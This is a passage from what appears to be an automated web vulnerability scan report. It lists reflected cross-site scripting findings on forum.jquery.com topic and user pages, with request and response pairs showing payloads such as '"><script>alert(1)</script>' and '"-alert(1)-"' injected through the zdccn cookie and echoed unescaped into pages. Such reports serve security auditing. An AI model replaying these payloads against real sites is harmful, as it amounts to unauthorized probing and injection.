Date: Tue, 16 Nov 2010 02:39:11 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb859be"><script>alert(1)</script>42f5fe768cd"/>
...[SNIP]...

1.270. http://forum.jquery.com/topic/how-can-i-help-9-5-2010 [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/topic/how-can-i-help-9-5-2010

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd65c"><script>alert(1)</script>bcb118b7181 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /topic/how-can-i-help-9-5-2010 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbfd65c"><script>alert(1)</script>bcb118b7181;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D17F2CB77FD5EEB8B8B71A24DB538F05; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:06 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbbfd65c"><script>alert(1)</script>bcb118b7181"/>
...[SNIP]...

1.271. http://forum.jquery.com/topic/how-can-i-help-9-5-2010 [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/topic/how-can-i-help-9-5-2010

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28b38"-alert(1)-"168f0cab024 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7DDB9118B4CBB89DC25B609C9374DB48; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:29 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb28b38"-alert(1)-"168f0cab024";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.272. http://forum.jquery.com/topic/looking-for-help-on-panel-development [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/topic/looking-for-help-on-panel-development

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 263d3"-alert(1)-"00a9a98b334 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic/looking-for-help-on-panel-development HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb263d3"-alert(1)-"00a9a98b334;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C038A38CA89AB45BA7F31672274A9BAB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:31 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb263d3"-alert(1)-"00a9a98b334";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.273. http://forum.jquery.com/topic/looking-for-help-on-panel-development [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/topic/looking-for-help-on-panel-development

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3614e"><script>alert(1)</script>86359096cc2 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=398712AD684CA524C52F4C109C44C26E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:01 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb3614e"><script>alert(1)</script>86359096cc2"/>
...[SNIP]...

1.274. http://forum.jquery.com/user/andrew_powell [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/andrew_powell

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49c13"><script>alert(1)</script>fe4dc260b4 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /user/andrew_powell HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb49c13"><script>alert(1)</script>fe4dc260b4;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=F72C626CD040A5191DDDB2DFF045B372; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:43 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb49c13"><script>alert(1)</script>fe4dc260b4"/>
...[SNIP]...

1.275. http://forum.jquery.com/user/andrew_powell [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/andrew_powell

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6d2b"-alert(1)-"c7e0806c31b was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=88E89C4B3C3D2D87AADFC85DB4FF8C0E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:45 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbbc6d2b"-alert(1)-"c7e0806c31b";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.276. http://forum.jquery.com/user/charlietfl [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/charlietfl

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fbcc"-alert(1)-"86f865f8e09 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /user/charlietfl HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb1fbcc"-alert(1)-"86f865f8e09;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C89F73911CAFCEDA5CA47373F30BAE02; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:36:40 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb1fbcc"-alert(1)-"86f865f8e09";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.277. http://forum.jquery.com/user/charlietfl [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/charlietfl

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a005"><script>alert(1)</script>e468869eafa was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=CC7F9CB9130F201958A5C10D6A0CF390; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:35:37 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb1a005"><script>alert(1)</script>e468869eafa"/>
...[SNIP]...

1.278. http://forum.jquery.com/user/christophe [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/christophe

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21b6d"-alert(1)-"cdf3c757657 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /user/christophe HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb21b6d"-alert(1)-"cdf3c757657;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E1BE041113D88A547B7173A211036D07; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:37:11 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb21b6d"-alert(1)-"cdf3c757657";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.279. http://forum.jquery.com/user/christophe [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/christophe

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d8c9"><script>alert(1)</script>c36392dba09 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=CDB738F70C802B993C1EAC3A9CDC9639; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:36:16 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb1d8c9"><script>alert(1)</script>c36392dba09"/>
...[SNIP]...

1.280. http://forum.jquery.com/user/jeresig [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/jeresig

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20c61"-alert(1)-"9dded2314a0 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /user/jeresig HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb20c61"-alert(1)-"9dded2314a0;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=AFFD3695C6A1B4899C0B6D89338AEBA0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:35:12 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb20c61"-alert(1)-"9dded2314a0";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.281. http://forum.jquery.com/user/jeresig [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/jeresig

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de16"><script>alert(1)</script>302caaaea60 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D96A0F29D5F3C7A3CA27C45CF47D3163; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:03 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb1de16"><script>alert(1)</script>302caaaea60"/>
...[SNIP]...

1.282. http://forum.jquery.com/user/kbwood.au [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/kbwood.au

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c62f0"-alert(1)-"f8d6c6dc3fd was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /user/kbwood.au HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbc62f0"-alert(1)-"f8d6c6dc3fd;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=97E4E92BE4AEDB96ACB501A683A1B9A5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:37:08 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbbc62f0"-alert(1)-"f8d6c6dc3fd";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.283. http://forum.jquery.com/user/kbwood.au [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/kbwood.au

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a619a"><script>alert(1)</script>a965955940b was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B263E533E3F581956D9FE0C35D2DD655; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:36:07 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbba619a"><script>alert(1)</script>a965955940b"/>
...[SNIP]...

1.284. http://forum.jquery.com/user/scottjehl [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/scottjehl

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f792"-alert(1)-"a3b68d9dc15 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /user/scottjehl HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb8f792"-alert(1)-"a3b68d9dc15;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=14A669DE6272A941768E7925021199D2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:50 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb8f792"-alert(1)-"a3b68d9dc15";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.285. http://forum.jquery.com/user/scottjehl [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/scottjehl

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c604"><script>alert(1)</script>054deb72aea was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

